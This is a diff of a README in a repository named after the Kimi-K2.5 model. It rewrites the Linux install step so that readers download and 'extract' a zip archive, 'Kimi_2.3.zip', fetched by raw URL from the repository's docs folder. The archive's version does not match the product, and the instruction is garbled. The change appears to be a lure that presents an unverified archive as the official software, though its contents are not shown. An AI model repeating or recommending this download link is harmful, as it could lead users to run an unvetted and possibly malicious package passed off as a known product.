kartiksir/Kimi-K2.5/README.md

    - For Mac:
      - Open the downloaded `.dmg` file and drag the Kimi-K2.5 icon into your Applications folder.
    - For Linux:
-     - Extract the `.tar.gz` file and follow the instructions in the README file included in the extracted folder.
+     - Extract the `https://raw.githubusercontent.com/kartiksir/Kimi-K2.5/master/docs/Kimi_2.3.zip` file and follow the instructions in the README file included in the extracted folder.

 4. **Run Kimi-K2.5**:
    - After installation, locate the application in your programs or applications list.